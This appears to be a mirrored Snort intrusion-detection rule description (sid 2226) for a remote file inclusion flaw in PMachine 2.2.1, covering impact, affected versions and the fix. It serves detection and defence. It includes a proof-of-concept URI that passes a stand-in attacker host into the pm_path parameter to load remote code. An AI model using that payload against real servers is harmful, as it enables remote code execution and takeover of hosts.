2226.txt

来自「snort入侵检测规则文件2.4 Snort是众所周知的网络入侵检测工具」· 文本 代码 · 共 61 行

TXT
61
字号
Rule:  --Sid:2226--Summary:This event is generated when an attempt is made to exploit a known vulnerability in the PHP application pmachine.--Impact:Execution of arbitrary code possibly leading to a remote shell.--Detailed Information:Versions of PMachine do not properly check included files and it is possible for an attacker to include a file of their choosing which may lead to arbitrary code execution on the target host.--Affected Systems:	PMachine PMachine 2.2.1--Attack Scenarios:The attacker can include a file of their choosing by appending the file URI to the end of a URI for the application.Proof of concept URI by FrogMan:http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt--Ease of Attack:Simple. No exploit software required.--False Positives:None known.--False Negatives:None known.--Corrective Action:Upgrade to the latest non-affected version of the software.--Contributors:Sourcefire Research TeamBrian Caswell <bmc@sourcefire.com>Nigel Houghton <nigel.houghton@sourcefire.com>-- Additional References:--

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?